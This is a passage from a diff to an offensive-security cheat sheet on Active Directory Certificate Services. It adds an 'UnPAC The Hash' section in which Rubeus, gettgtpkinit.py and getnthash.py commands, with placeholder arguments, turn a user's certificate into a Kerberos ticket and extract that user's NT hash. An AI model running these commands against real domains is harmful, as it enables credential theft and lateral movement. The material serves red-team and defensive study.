swisskyrepo/InternalAllTheThings/docs/active-directory/ad-adcs-certificate-services.md

   certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain' certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
   ```

+## UnPAC The Hash

+Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate.

+* Windows
+    ```ps1
+    # Request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC.
+    Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
+    ```
+* Linux
+    ```ps1
+    # Obtain a TGT by validating a PKINIT pre-authentication
+    $ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"

+    # Use the session key to recover the NT hash
+    $ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'
+    ```